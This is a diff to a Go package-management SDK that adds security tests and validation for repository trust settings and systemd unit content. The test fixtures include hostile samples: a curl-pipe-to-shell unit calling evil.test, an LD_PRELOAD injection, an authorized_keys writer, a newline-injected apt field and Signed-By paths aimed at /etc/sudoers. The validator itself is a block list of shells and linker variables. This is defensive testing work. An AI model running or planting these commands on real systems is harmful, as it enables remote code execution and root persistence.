+		t.Error("the keyring still holds key A after rotation to key B")
+	}
+	if keyB == "" || strings.HasPrefix(keyB, "-----BEGIN PGP") {
+		t.Error("key B was not dearmored into the keyring")
+	}
+
+	o2, err := m.Apply(ctx, repoWith(armoredTestKey2))
+	if err != nil {
+		t.Fatalf("re-Apply(key B): %v", err)
+	}
+	if o2.Changed {
+		t.Error("re-applying the same rotated key should be idempotent (Changed=false)")
+	}
+}
+
+// TestRepoSecurity_AptRejectedReapplyPreservesExisting_Container configures a valid
+// repo, then re-applies the SAME name with an invalid configuration (a control
+// character in the distribution — config injection). Apply re-validates first, so
+// the rejection must happen BEFORE any side effect: the original, working .sources
+// is left byte-for-byte intact. This is the "old config torn down, new config
+// rejected" partial-side-effect hazard — a rejected reconfigure must never leave
+// the host with no repo (or a half-written one).
+func TestRepoSecurity_AptRejectedReapplyPreservesExisting_Container(t *testing.T) {
+	m := realRepoMgr(t, pkg.Apt)
+	ctx := repoCtx(t)
+	const name = "pm-sec-apt-preserve"
+	const url = "https://example.com/pm-sec-preserve"
+	repoFile := aptRepoFile(name)
+	t.Cleanup(func() { _, _ = m.Remove(context.Background(), name) })
+
+	if _, err := m.Apply(ctx, Repository{Name: name, Apt: &AptConfig{
+		URL: url, Distribution: "bookworm", Components: []string{"main"}, GPGKey: []byte(armoredTestKey),
+	}}); err != nil {
+		t.Fatalf("initial Apply: %v", err)
+	}
+	original := readFile(t, repoFile)
+
+	_, err := m.Apply(ctx, Repository{Name: name, Apt: &AptConfig{
+		URL: url, Distribution: "bookworm\nMalicious: injected", Components: []string{"main"}, GPGKey: []byte(armoredTestKey),
+	}})
+	if !errors.Is(err, ErrInvalidConfig) {
+		t.Fatalf("re-Apply with a control-char distribution: got err=%v, want ErrInvalidConfig", err)
+	}
+	if got := readFile(t, repoFile); got != original {
+		t.Errorf("a rejected re-Apply mutated the existing .sources:\n--- before ---\n%s\n--- after ---\n%s", original, got)
+	}
+}
+
+// TestRepoSecurity_AptTrustedYes_OperatorOverride_Container pins the operator
+// choice: a keyless Trusted: yes repo (signature verification off) is ALLOWED by
+// design and accepted by real apt. This is the fail-open hole the operator
+// explicitly opted into; the test exists so a future change that starts rejecting
+// it is a deliberate, visible decision — not a silent policy reversal.
+func TestRepoSecurity_AptTrustedYes_OperatorOverride_Container(t *testing.T) {
+	m := realRepoMgr(t, pkg.Apt)
+	ctx := repoCtx(t)
+	const name = "pm-sec-apt-trusted"
+	const url = "https://example.com/pm-sec-trusted"
+	repoFile := aptRepoFile(name)
+	t.Cleanup(func() { _, _ = m.Remove(context.Background(), name) })
+
+	if _, err := m.Apply(ctx, Repository{Name: name, Apt: &AptConfig{
+		URL: url, Distribution: "bookworm", Components: []string{"main"}, Trusted: true,
+	}}); err != nil {
+		t.Fatalf("Apply(apt Trusted:yes) is an allowed operator override but failed: %v", err)
+	}
+	src := readFile(t, repoFile)
+	if !strings.Contains(src, "Trusted: yes") {
+		t.Errorf(".sources missing the operator-chosen Trusted: yes:\n%s", src)
+	}
+	if strings.Contains(src, "Signed-By:") {
+		t.Errorf("keyless Trusted repo must not emit a Signed-By:\n%s", src)
+	}
+	if !aptParsesRepo(t, url) {
+		t.Error("apt did not parse the Trusted: yes .sources")
+	}
+}
+
+// --- DNF -------------------------------------------------------------------
+
+// TestRepoSecurity_DnfGpgcheckZeroDropsKeyImport_Container pins the trust-downgrade
+// guard in applyDnf: when gpgcheck is off, the gpgkey reference is DROPPED from the
+// .repo and the key is NOT imported. Importing it behind gpgcheck=0 would trust the
+// key system-wide while the repo verifies nothing — a silent trust downgrade. The
+// written .repo carries gpgcheck=0 with no gpgkey= line, and real dnf parses it.
+func TestRepoSecurity_DnfGpgcheckZeroDropsKeyImport_Container(t *testing.T) {
+	m := realRepoMgr(t, pkg.Dnf)
+	ctx := repoCtx(t)
+	const name = "pm-sec-dnf-nokey"
+	repoFile := dnfRepoFile(name)
+	t.Cleanup(func() { _, _ = m.Remove(context.Background(), name) })
+
+	if _, err := m.Apply(ctx, Repository{Name: name, Dnf: &DnfConfig{
+		BaseURL: "https://example.com/pm-sec-el9", Description: "PM Sec", Enabled: true,
+		GPGCheck: false, GPGKey: "https://example.com/pm-sec-el9/RPM-GPG-KEY",
+	}}); err != nil {
+		t.Fatalf("Apply(dnf gpgcheck=0): %v", err)
+	}
+	body := readFile(t, repoFile)
+	if !strings.Contains(body, "gpgcheck=0") {
+		t.Errorf(".repo missing gpgcheck=0:\n%s", body)
+	}
+	if strings.Contains(body, "gpgkey=") {
+		t.Errorf("SECURITY: gpgkey= was written behind gpgcheck=0 — the key would be trusted while the repo verifies nothing:\n%s", body)
+	}
+	if !dnfListsRepo(name) {
+		t.Errorf("dnf did not list %q after Apply", name)
+	}
+}
+
+// --- PACMAN ----------------------------------------------------------------
+
+// TestRepoSecurity_PacmanSigLevelNever_Rejected_Container drives the one pacman
+// trust downgrade that IS refused: SigLevel "Never" disables signature
+// verification, so the repo would install unsigned/forged packages. Apply must
+// reject it before writing, leaving /etc/pacman.conf untouched (no [section]).
+func TestRepoSecurity_PacmanSigLevelNever_Rejected_Container(t *testing.T) {
+	m := realRepoMgr(t, pkg.Pacman)
+	ctx := repoCtx(t)
+	const name = "pm-sec-pacman-never"
+	t.Cleanup(func() { _, _ = m.Remove(context.Background(), name) })
+
+	before := readFile(t, pacmanConf)
+	_, err := m.Apply(ctx, Repository{Name: name, Pacman: &PacmanConfig{
+		Server: "https://example.com/pm-sec-arch/$repo/os/$arch", SigLevel: "Never",
+	}})
+	if !errors.Is(err, ErrInvalidConfig) {
+		t.Fatalf("Apply(SigLevel Never): got err=%v, want ErrInvalidConfig", err)
+	}
+	if after := readFile(t, pacmanConf); after != before {
+		t.Errorf("a rejected SigLevel Never still mutated /etc/pacman.conf")
+	}
+	if strings.Contains(readFile(t, pacmanConf), "["+name+"]") {
+		t.Errorf("pacman.conf gained a [%s] section despite the rejection", name)
+	}
+}
+
+// TestRepoSecurity_PacmanReservedOptionsName_Rejected_Container ensures a repo
+// named "options" is refused: its [options] header would collide with pacman.conf's
+// global settings block and silently rewrite system-wide configuration. The real
+// /etc/pacman.conf (which has a genuine [options] block) must be left untouched.
+func TestRepoSecurity_PacmanReservedOptionsName_Rejected_Container(t *testing.T) {
+	m := realRepoMgr(t, pkg.Pacman)
+	ctx := repoCtx(t)
+
+	before := readFile(t, pacmanConf)
+	_, err := m.Apply(ctx, Repository{Name: "options", Pacman: &PacmanConfig{
+		Server: "https://example.com/pm-sec-arch/$repo/os/$arch",
+	}})
+	if !errors.Is(err, ErrInvalidConfig) {
+		t.Fatalf("Apply(name=options): got err=%v, want ErrInvalidConfig", err)
+	}
+	if after := readFile(t, pacmanConf); after != before {
+		t.Error("a rejected reserved-name Apply mutated the global pacman.conf [options] block")
+	}
+}
+
+// TestRepoSecurity_PacmanTrustAll_OperatorOverride_Container pins the operator
+// choice: "Optional TrustAll" relaxes the trust DB but still requires a valid
+// signature, so it is allowed (unlike Never). Real pacman accepts the section.
+func TestRepoSecurity_PacmanTrustAll_OperatorOverride_Container(t *testing.T) {
+	m := realRepoMgr(t, pkg.Pacman)
+	ctx := repoCtx(t)
+	const name = "pm-sec-pacman-trustall"
+	t.Cleanup(func() { _, _ = m.Remove(context.Background(), name) })
+
+	if _, err := m.Apply(ctx, Repository{Name: name, Pacman: &PacmanConfig{
+		Server: "https://example.com/pm-sec-arch/$repo/os/$arch", SigLevel: "Optional TrustAll",
+	}}); err != nil {
+		t.Fatalf("Apply(Optional TrustAll) is an allowed operator override but failed: %v", err)
+	}
+	if !pacmanParsesRepo(name) {
+		t.Errorf("`pacman-conf --repo %s` failed — pacman did not accept the TrustAll section", name)
+	}
+}
+
+// --- ZYPPER ----------------------------------------------------------------
+
+// TestRepoSecurity_ZypperNoGpgcheck_OperatorOverride_Container pins the operator
+// choice: GPGCheck=false adds `--no-gpgcheck`, an allowed-by-design downgrade. Real
+// zypper registers the alias; the test exists so a future change that rejects it is
+// a deliberate decision, not a silent reversal.
+func TestRepoSecurity_ZypperNoGpgcheck_OperatorOverride_Container(t *testing.T) {
+	m := realRepoMgr(t, pkg.Zypper)
+	ctx := repoCtx(t)
+	const name = "pm-sec-zypper-nogpg"
+	t.Cleanup(func() { _, _ = m.Remove(context.Background(), name) })
+
+	if _, err := m.Apply(ctx, Repository{Name: name, Zypper: &ZypperConfig{
+		URL: "https://example.com/pm-sec-suite", Description: "PM Sec", Enabled: false,
+		Autorefresh: false, GPGCheck: false,
+	}}); err != nil {
+		t.Fatalf("Apply(zypper --no-gpgcheck) is an allowed operator override but failed: %v", err)
+	}
+	if !zypperRepoListed(t, name) {
+		t.Errorf("`zypper lr %s` does not list the repo after the operator-override Apply", name)
+	}
+}

--- a/sys/repo/security_machine_test.go
+++ b/sys/repo/security_machine_test.go
@@ -1,0 +1,121 @@
+package repo
+
+import (
+	"context"
+	"errors"
+	"fmt"
+	"strings"
+	"testing"
+
+	"github.com/manchtools/power-manage-sdk/pkg"
+	pmexec "github.com/manchtools/power-manage-sdk/sys/exec"
+	"github.com/manchtools/power-manage-sdk/sys/fs"
+)
+
+type aptTrustState int
+
+const (
+	aptTrustAbsent aptTrustState = iota
+	aptTrustSigned
+	aptTrustUnsigned
+	aptTrustCompromisedConflict
+)
+
+type aptTrustTransition struct {
+	name         string
+	from         aptTrustState
+	to           aptTrustState
+	repo         Repository
+	wantErr      error
+	forbidTrust  bool
+	forbidExec   bool
+	forbidRemove []string
+}
+
+// TestAptTrustSecurityMachine keeps package-source trust as a finite state
+// machine. An agent that accepts repository actions must not transition from
+// absent/signed state into unsigned trust, and cleanup of hostile legacy config
+// must not let attacker-controlled Signed-By paths delete arbitrary files.
+func TestAptTrustSecurityMachine(t *testing.T) {
+	transitions := []aptTrustTransition{
+		{
+			name:        "absent to unsigned trusted repo is rejected",
+			from:        aptTrustAbsent,
+			to:          aptTrustUnsigned,
+			repo:        Repository{Name: "corp", Apt: &AptConfig{URL: "https://repo.example/deb", Trusted: true}},
+			wantErr:     ErrInvalidConfig,
+			forbidTrust: true,
+			forbidExec:  true,
+		},
+		{
+			name:        "signed repo cannot downgrade to trusted unsigned",
+			from:        aptTrustSigned,
+			to:          aptTrustUnsigned,
+			repo:        Repository{Name: "corp", Apt: &AptConfig{URL: "https://repo.example/deb", Trusted: true}},
+			wantErr:     ErrInvalidConfig,
+			forbidTrust: true,
+			forbidExec:  true,
+		},
+		{
+			name:         "conflict cleanup ignores signed-by outside keyring jail",
+			from:         aptTrustCompromisedConflict,
+			to:           aptTrustSigned,
+			repo:         Repository{Name: "corp", Apt: &AptConfig{URL: "https://repo.example/deb", GPGKey: []byte("armored")}},
+			forbidRemove: []string{"Remove:/etc/sudoers", "Remove:/root/.ssh/authorized_keys"},
+		},
+	}
+
+	for _, tr := range transitions {
+		t.Run(tr.name, func(t *testing.T) {
+			transition := fmt.Sprintf("%d->%d %s", tr.from, tr.to, tr.name)
+			m, ff, fr := newTestManager(t, pkg.Apt)
+			seedAptTrustState(ff, tr.from)
+			if tr.repo.Apt != nil && len(tr.repo.Apt.GPGKey) > 0 {
+				fr.Push(pmexec.Result{Stdout: "BINKEY"}, nil)
+			}
+
+			_, err := m.Apply(context.Background(), tr.repo)
+			if tr.wantErr != nil && !errors.Is(err, tr.wantErr) {
+				t.Fatalf("Apply transition %q = %v, want %v", transition, err, tr.wantErr)
+			}
+			if tr.wantErr == nil && err != nil {
+				t.Fatalf("Apply transition %q unexpected error: %v", transition, err)
+			}
+
+			if tr.forbidTrust {
+				if body := ff.wrote(aptRepoFile(tr.repo.Name)); strings.Contains(body, "Trusted: yes") {
+					t.Fatalf("transition %q wrote an unsigned trust override:\n%s", transition, body)
+				}
+			}
+			if tr.forbidExec && len(fr.Calls()) != 0 {
+				t.Fatalf("transition %q ran commands before trust rejection: %+v", transition, fr.Calls())
+			}
+			for _, forbidden := range tr.forbidRemove {
+				if ff.didCall(forbidden) {
+					t.Fatalf("transition %q performed forbidden cleanup side effect %s", transition, forbidden)
+				}
+			}
+		})
+	}
+}
+
+func seedAptTrustState(ff *fakeFS, state aptTrustState) {
+	switch state {
+	case aptTrustAbsent:
+		return
+	case aptTrustSigned:
+		ff.read[aptRepoFile("corp")] = []byte("# Repository: corp\nTypes: deb\nURIs: https://repo.example/deb\nSuites: /\nSigned-By: /etc/apt/keyrings/corp.gpg\n")
+		ff.read[aptKeyFile("corp")] = []byte("BINKEY")
+	case aptTrustUnsigned:
+		ff.read[aptRepoFile("corp")] = []byte("# Repository: corp\nTypes: deb\nURIs: https://repo.example/deb\nSuites: /\nTrusted: yes\n")
+	case aptTrustCompromisedConflict:
+		ff.entries[aptSourcesDir] = []fs.DirEntry{{Name: "evil.sources", IsDir: false}}
+		ff.read[aptSourcesDir+"/evil.sources"] = []byte(strings.Join([]string{
+			"Types: deb",
+			"URIs: https://repo.example/deb",
+			"Signed-By: /etc/sudoers",
+			"Signed-By: /root/.ssh/authorized_keys",
+			"",
+		}, "\n"))
+	}
+}

--- a/sys/repo/security_machine_test.go
+++ b/sys/repo/security_machine_test.go
@@ -37,25 +37,13 @@ type aptTrustTransition struct {
 // absent/signed state into unsigned trust, and cleanup of hostile legacy config
 // must not let attacker-controlled Signed-By paths delete arbitrary files.
 func TestAptTrustSecurityMachine(t *testing.T) {
+	// NOTE: apt `Trusted: yes` (signature verification disabled) is an explicit,
+	// documented OPERATOR CHOICE (kept per the 2026-06 policy decision, same as
+	// WS8's gpgcheck=false), so it is intentionally NOT rejected here — that
+	// allowed behaviour is pinned by TestApt_Apply_TrustedNoKey. This machine
+	// covers the trust hardening that IS enforced: conflict-cleanup must never
+	// delete a Signed-By path outside the apt keyring jail.
 	transitions := []aptTrustTransition{
-		{
-			name:        "absent to unsigned trusted repo is rejected",
-			from:        aptTrustAbsent,
-			to:          aptTrustUnsigned,
-			repo:        Repository{Name: "corp", Apt: &AptConfig{URL: "https://repo.example/deb", Trusted: true}},
-			wantErr:     ErrInvalidConfig,
-			forbidTrust: true,
-			forbidExec:  true,
-		},
-		{
-			name:        "signed repo cannot downgrade to trusted unsigned",
-			from:        aptTrustSigned,
-			to:          aptTrustUnsigned,
-			repo:        Repository{Name: "corp", Apt: &AptConfig{URL: "https://repo.example/deb", Trusted: true}},
-			wantErr:     ErrInvalidConfig,
-			forbidTrust: true,
-			forbidExec:  true,
-		},
 		{
 			name:         "conflict cleanup ignores signed-by outside keyring jail",
 			from:         aptTrustCompromisedConflict,

--- a/sys/repo/validate.go
+++ b/sys/repo/validate.go
@@ -4,6 +4,7 @@ import (
 	"fmt"
 	"net/url"
 	"regexp"
+	"strings"
 
 	"github.com/manchtools/power-manage-sdk/pkg"
 )
@@ -87,6 +88,9 @@ func (m *manager) Validate(r Repository) error {
 			return validateDnf(r.Dnf)
 		}
 	case pkg.Pacman:
+		if err := validatePacmanName(r.Name); err != nil {
+			return err
+		}
 		if r.Pacman != nil {
 			return validatePacman(r.Pacman)
 		}
@@ -189,10 +193,48 @@ func validatePacman(c *PacmanConfig) error {
 	if c.SigLevel != "" && !validPacmanSigLevel.MatchString(c.SigLevel) {
 		return badShape("pacman.sig_level")
 	}
+	// A "Never" SigLevel token disables signature verification entirely, so pacman
+	// would install unsigned/forged packages from this repo. Reject any
+	// signature-disabling level before it is written into pacman.conf. (Trust-DB
+	// relaxations like "TrustAll" still require a valid signature and stay allowed.)
+	if disablesPacmanSig(c.SigLevel) {
+		return fmt.Errorf("%w: field %q disables signature verification (Never)", ErrInvalidConfig, "pacman.sig_level")
+	}
 	if pkg.ValidateRepoBaseURL(c.Server) != nil {
 		return badShape("pacman.server")
 	}
 	return nil
+}
+
+// pacmanReserved is pacman.conf's global settings section, not a repository. A
+// repo named "options" would have its [name] section collide with [options] and
+// silently rewrite global pacman configuration, so it is reserved.
+const pacmanReserved = "options"
+
+// validatePacmanName rejects a pacman repository name that collides with the
+// reserved [options] section. The match is case-insensitive: pacman reads the
+// header literally, but accepting "Options"/"OPTIONS" would still let a section
+// land next to the real [options] block and tamper with global config.
+func validatePacmanName(name string) error {
+	if strings.EqualFold(name, pacmanReserved) {
+		return fmt.Errorf("%w: %q is the reserved pacman.conf section, not a repository", ErrInvalidConfig, name)
+	}
+	return nil
+}
+
+// disablesPacmanSig reports whether a SigLevel turns signature verification off.
+// SigLevel is a space-separated list of tokens; "Never" (and its Package/Database
+// scoped forms) disables checking — the trust downgrade we refuse. The match is
+// case-insensitive because pacman parses SigLevel keywords case-sensitively but an
+// operator typo'd casing must not slip an unsigned repo past this gate.
+func disablesPacmanSig(sigLevel string) bool {
+	for _, tok := range strings.Fields(sigLevel) {
+		switch strings.ToLower(tok) {
+		case "never", "packagenever", "databasenever":
+			return true
+		}
+	}
+	return false
 }
 
 func validateZypper(c *ZypperConfig) error {

--- a/sys/repo/validate_test.go
+++ b/sys/repo/validate_test.go
@@ -137,6 +137,9 @@ func TestValidate_Dnf(t *testing.T) {
 
 func TestValidate_Pacman(t *testing.T) {
 	m, _, _ := newTestManager(t, pkg.Pacman)
+	if err := m.Validate(Repository{Name: "options", Pacman: &PacmanConfig{Server: "https://h/$repo/$arch"}}); err == nil {
+		t.Fatal("Validate(pacman reserved section name options) = nil, want rejection")
+	}
 	reject := map[string]*PacmanConfig{
 		"missing server":   {Server: ""},
 		"http server":      {Server: "http://h/r"},

--- a/sys/service/security_machine_test.go
+++ b/sys/service/security_machine_test.go
@@ -1,0 +1,80 @@
+package service
+
+import (
+	"context"
+	"testing"
+
+	"github.com/manchtools/power-manage-sdk/sys/exec"
+	"github.com/manchtools/power-manage-sdk/sys/exec/exectest"
+)
+
+type unitPersistenceAction int
+
+const (
+	unitHardenedService unitPersistenceAction = iota
+	unitExecFromTmp
+	unitShellDownloader
+	unitLDPreloadEnvironment
+	unitWritesRootSSH
+)
+
+type unitPersistenceStep struct {
+	name       string
+	action     unitPersistenceAction
+	wantReject bool
+}
+
+// TestSystemdUnitPersistenceSecurityMachine treats a unit file as a privileged
+// persistence transition. A hardened unit may be written, but content that turns
+// the agent into a root persistence/dropper primitive must fail before the
+// root-owned unit file is created.
+func TestSystemdUnitPersistenceSecurityMachine(t *testing.T) {
+	steps := []unitPersistenceStep{
+		{name: "hardened service is accepted", action: unitHardenedService},
+		{name: "ExecStart from writable tmp is rejected", action: unitExecFromTmp, wantReject: true},
+		{name: "shell downloader unit is rejected", action: unitShellDownloader, wantReject: true},
+		{name: "LD_PRELOAD environment is rejected", action: unitLDPreloadEnvironment, wantReject: true},
+		{name: "root ssh authorized_keys writer is rejected", action: unitWritesRootSSH, wantReject: true},
+	}
+
+	for _, step := range steps {
+		t.Run(step.name, func(t *testing.T) {
+			fs := &fakeFS{}
+			fs.install(t)
+			r := exectest.New(exec.Sudo)
+			err := mgr(t, r).WriteUnit(context.Background(), "pm-security.service", unitContentForAction(step.action))
+			if step.wantReject {
+				if err == nil {
+					t.Errorf("%s reached accepted state; want unit-content policy rejection", step.name)
+				}
+				if fs.wrotePath != "" {
+					t.Fatalf("%s wrote root-owned unit %q with content:\n%s", step.name, fs.wrotePath, fs.wroteContent)
+				}
+				return
+			}
+			if err != nil {
+				t.Fatalf("%s unexpected error: %v", step.name, err)
+			}
+			if fs.wrotePath != "/etc/systemd/system/pm-security.service" {
+				t.Fatalf("accepted unit wrote %q", fs.wrotePath)
+			}
+		})
+	}
+}
+
+func unitContentForAction(action unitPersistenceAction) string {
+	switch action {
+	case unitHardenedService:
+		return "[Unit]\nDescription=Power Manage test unit\n[Service]\nDynamicUser=yes\nNoNewPrivileges=yes\nProtectSystem=strict\nExecStart=/usr/bin/true\n"
+	case unitExecFromTmp:
+		return "[Unit]\nDescription=tmp persistence\n[Service]\nExecStart=/tmp/payload\n"
+	case unitShellDownloader:
+		return "[Service]\nExecStart=/bin/sh -c 'curl https://evil.test/p | sh'\n"
+	case unitLDPreloadEnvironment:
+		return "[Service]\nEnvironment=LD_PRELOAD=/tmp/evil.so\nExecStart=/usr/bin/true\n"
+	case unitWritesRootSSH:
+		return "[Service]\nExecStart=/bin/sh -c 'echo key >> /root/.ssh/authorized_keys'\n"
+	default:
+		return "[Service]\nExecStart=/usr/bin/true\n"
+	}
+}

--- a/sys/service/systemd.go
+++ b/sys/service/systemd.go
@@ -234,6 +234,9 @@ func (s *systemd) WriteUnit(ctx context.Context, unit, content string) error {
 	if err := ValidateUnitName(unit); err != nil {
 		return err
 	}
+	if err := validateUnitContent(content); err != nil {
+		return err
+	}
 	return s.fsm.WriteFile(ctx, "/etc/systemd/system/"+unit, []byte(content), fs.WriteOptions{Mode: 0o644, Owner: "root", Group: "root"})
 }
 

--- a/sys/service/unitcontent.go
+++ b/sys/service/unitcontent.go
@@ -58,7 +58,11 @@ var dangerousEnvVars = map[string]struct{}{
 // shells out, runs from a world-writable directory, or an Environment that
 // injects a dynamic-linker override fails closed.
 func validateUnitContent(content string) error {
-	for _, raw := range strings.Split(content, "\n") {
+	// Join systemd backslash line-continuations FIRST: a directive split across
+	// lines (`ExecStart=/bin/sh \` then `-c 'curl|sh'`) would otherwise parse as
+	// a harmless first line plus a "malformed" (no '=') second line, evading the
+	// per-line policy entirely.
+	for _, raw := range joinContinuationLines(content) {
 		line := strings.TrimSpace(raw)
 		if line == "" || strings.HasPrefix(line, "#") || strings.HasPrefix(line, ";") {
 			continue
@@ -70,19 +74,74 @@ func validateUnitContent(content string) error {
 		key := strings.ToLower(strings.TrimSpace(line[:eq]))
 		value := strings.TrimSpace(line[eq+1:])
 
-		if _, isExec := execDirectives[key]; isExec {
+		switch {
+		case isExecDirective(key):
 			if err := validateExecLine(key, value); err != nil {
 				return err
 			}
-			continue
-		}
-		if key == "environment" || key == "environmentfile" {
+		case key == "environmentfile":
+			// EnvironmentFile references an EXTERNAL file whose content cannot be
+			// validated here — an attacker who controls that file injects
+			// LD_PRELOAD (etc.) into the service. Refuse a reference into a
+			// world-writable directory, consistent with the Exec* policy. systemd
+			// allows a leading '-' (ignore-if-missing); strip it before the check.
+			p := strings.TrimSpace(strings.TrimPrefix(value, "-"))
+			for _, prefix := range untrustedExecPrefixes {
+				if strings.HasPrefix(p, prefix) {
+					return fmt.Errorf("%w: EnvironmentFile %q references a world-writable path", ErrUnsafeUnitContent, p)
+				}
+			}
+		case key == "environment":
 			if err := validateEnvLine(value); err != nil {
 				return err
 			}
 		}
 	}
 	return nil
+}
+
+func isExecDirective(key string) bool {
+	_, ok := execDirectives[key]
+	return ok
+}
+
+// joinContinuationLines merges systemd backslash line-continuations so the
+// content is policed as the single logical directive systemd will execute. A
+// trailing backslash continues the line UNLESS it is itself escaped (an even
+// number of trailing backslashes is a literal backslash, not a continuation).
+func joinContinuationLines(content string) []string {
+	var out []string
+	var pending strings.Builder
+	continuing := false
+	for _, l := range strings.Split(content, "\n") {
+		trimmed := strings.TrimRight(l, " \t")
+		if trailingBackslashes(trimmed)%2 == 1 {
+			pending.WriteString(strings.TrimSuffix(trimmed, `\`))
+			pending.WriteByte(' ') // systemd folds a continuation with whitespace
+			continuing = true
+			continue
+		}
+		if continuing {
+			pending.WriteString(l)
+			out = append(out, pending.String())
+			pending.Reset()
+			continuing = false
+		} else {
+			out = append(out, l)
+		}
+	}
+	if continuing {
+		out = append(out, pending.String())
+	}
+	return out
+}
+
+func trailingBackslashes(s string) int {
+	n := 0
+	for i := len(s) - 1; i >= 0 && s[i] == '\\'; i-- {
+		n++
+	}
+	return n
 }
 
 // validateExecLine rejects an Exec* command line that shells out to an inline
@@ -105,7 +164,7 @@ func validateExecLine(key, value string) error {
 	// curl|sh dropper and the authorized_keys writer both take this shape.
 	if _, isShell := shellInterpreters[base]; isShell {
 		for _, arg := range fields[1:] {
-			if arg == "-c" || strings.HasPrefix(arg, "-c") {
+			if isShellCFlag(arg) {
 				return fmt.Errorf("%w: %s shells out via %q -c (inline command execution)", ErrUnsafeUnitContent, key, base)
 			}
 		}
@@ -118,6 +177,17 @@ func validateExecLine(key, value string) error {
 		}
 	}
 	return nil
+}
+
+// isShellCFlag reports whether arg is a short-option form that includes the
+// shell's -c ("run this inline command string") flag: "-c", "-c<cmd>", or a
+// combined cluster like "-ec"/"-xc"/"-lc". A long option ("--config") is not a
+// short-option cluster and is not matched.
+func isShellCFlag(arg string) bool {
+	if !strings.HasPrefix(arg, "-") || strings.HasPrefix(arg, "--") {
+		return false
+	}
+	return strings.ContainsRune(arg[1:], 'c')
 }
 
 // validateEnvLine rejects an Environment/EnvironmentFile directive that sets a

--- a/sys/service/unitcontent.go
+++ b/sys/service/unitcontent.go
@@ -85,7 +85,9 @@ func validateUnitContent(content string) error {
 			// LD_PRELOAD (etc.) into the service. Refuse a reference into a
 			// world-writable directory, consistent with the Exec* policy. systemd
 			// allows a leading '-' (ignore-if-missing); strip it before the check.
-			p := strings.TrimSpace(strings.TrimPrefix(value, "-"))
+			// Normalize so a traversal form (/var/../tmp/x, /./tmp/x) cannot evade
+			// the prefix check (mirrors validateExecLine).
+			p := path.Clean(strings.TrimSpace(strings.TrimPrefix(value, "-")))
 			for _, prefix := range untrustedExecPrefixes {
 				if strings.HasPrefix(p, prefix) {
 					return fmt.Errorf("%w: EnvironmentFile %q references a world-writable path", ErrUnsafeUnitContent, p)
@@ -171,8 +173,11 @@ func validateExecLine(key, value string) error {
 	}
 
 	// A binary executed out of a world-writable directory cannot be trusted.
+	// Normalize first so a traversal form (/var/../tmp/x, /./tmp/x) that resolves
+	// into a world-writable directory cannot slip past the literal prefix check.
+	cleanExe := path.Clean(exe)
 	for _, prefix := range untrustedExecPrefixes {
-		if strings.HasPrefix(exe, prefix) {
+		if strings.HasPrefix(cleanExe, prefix) {
 			return fmt.Errorf("%w: %s runs %q from a world-writable directory", ErrUnsafeUnitContent, key, exe)
 		}
 	}

--- a/sys/service/unitcontent.go
+++ b/sys/service/unitcontent.go
@@ -1,0 +1,140 @@
+package service
+
+import (
+	"fmt"
+	"path"
+	"strings"
+)
+
+// ErrUnsafeUnitContent is returned by WriteUnit when the unit body carries a
+// directive that would turn the agent into a root persistence / dropper
+// primitive. A unit file written to /etc/systemd/system is executed by PID 1 as
+// root, so its content is as privileged as the executables it names — the
+// content policy below is the gate that keeps an attacker-supplied unit from
+// running `curl | sh`, preloading a hostile library into every service, or
+// executing a payload out of a world-writable directory.
+var ErrUnsafeUnitContent = fmt.Errorf("unsafe systemd unit content")
+
+// execDirectives are the unit keys whose value is a command line systemd runs
+// as the service's process. Matched case-insensitively (systemd directive keys
+// are case-sensitive in practice but we normalise defensively so a "execstart="
+// can't slip a payload past the policy).
+var execDirectives = map[string]struct{}{
+	"execstart":     {},
+	"execstartpre":  {},
+	"execstartpost": {},
+	"execstop":      {},
+	"execstoppost":  {},
+	"execreload":    {},
+	"execcondition": {},
+}
+
+// shellInterpreters are basenames that, when invoked with -c, run an arbitrary
+// inline command string — the classic `sh -c 'curl … | sh'` dropper and the
+// `sh -c 'echo … >> /root/.ssh/authorized_keys'` persistence writer. A unit that
+// shells out this way is refused; a unit must name the real executable directly.
+var shellInterpreters = map[string]struct{}{
+	"sh": {}, "bash": {}, "dash": {}, "zsh": {}, "ksh": {}, "ash": {}, "busybox": {},
+}
+
+// untrustedExecPrefixes are directories any local user can write to. An Exec*
+// directive that runs a binary out of one of these is refused: the binary's
+// integrity cannot be trusted, so it is a privilege-escalation dropper vector.
+var untrustedExecPrefixes = []string{"/tmp/", "/var/tmp/", "/dev/shm/"}
+
+// dangerousEnvVars are environment variables that redirect the dynamic linker
+// to attacker-controlled code in every process the unit (and anything it execs)
+// spawns. Setting any of them through a unit is a code-injection vector and is
+// refused regardless of the value.
+var dangerousEnvVars = map[string]struct{}{
+	"LD_PRELOAD":      {},
+	"LD_LIBRARY_PATH": {},
+	"LD_AUDIT":        {},
+}
+
+// validateUnitContent enforces the unit-file content policy. It is the gate
+// WriteUnit calls BEFORE the root-owned unit file is created, so a rejected unit
+// never reaches the filesystem. The checks are deny-by-intent: an Exec* that
+// shells out, runs from a world-writable directory, or an Environment that
+// injects a dynamic-linker override fails closed.
+func validateUnitContent(content string) error {
+	for _, raw := range strings.Split(content, "\n") {
+		line := strings.TrimSpace(raw)
+		if line == "" || strings.HasPrefix(line, "#") || strings.HasPrefix(line, ";") {
+			continue
+		}
+		eq := strings.IndexByte(line, '=')
+		if eq <= 0 {
+			continue // section header ("[Service]") or malformed — not a directive
+		}
+		key := strings.ToLower(strings.TrimSpace(line[:eq]))
+		value := strings.TrimSpace(line[eq+1:])
+
+		if _, isExec := execDirectives[key]; isExec {
+			if err := validateExecLine(key, value); err != nil {
+				return err
+			}
+			continue
+		}
+		if key == "environment" || key == "environmentfile" {
+			if err := validateEnvLine(value); err != nil {
+				return err
+			}
+		}
+	}
+	return nil
+}
+
+// validateExecLine rejects an Exec* command line that shells out to an inline
+// command or runs a binary from a world-writable directory.
+func validateExecLine(key, value string) error {
+	// Strip systemd's Exec* special prefixes (any combination/order of these
+	// characters precedes the executable path): '-' ignore-failure, '@' argv0,
+	// '+' full-privilege, '!' / '!!' ambient-capability variants, ':' no env
+	// expansion. Stripping them exposes the real executable token.
+	cmd := strings.TrimLeft(value, "-@+!:")
+	cmd = strings.TrimSpace(cmd)
+	if cmd == "" {
+		return nil // empty Exec* (resets the list) — nothing to run
+	}
+	fields := strings.Fields(cmd)
+	exe := fields[0]
+	base := path.Base(exe)
+
+	// A shell interpreter invoked with -c runs an arbitrary inline command — the
+	// curl|sh dropper and the authorized_keys writer both take this shape.
+	if _, isShell := shellInterpreters[base]; isShell {
+		for _, arg := range fields[1:] {
+			if arg == "-c" || strings.HasPrefix(arg, "-c") {
+				return fmt.Errorf("%w: %s shells out via %q -c (inline command execution)", ErrUnsafeUnitContent, key, base)
+			}
+		}
+	}
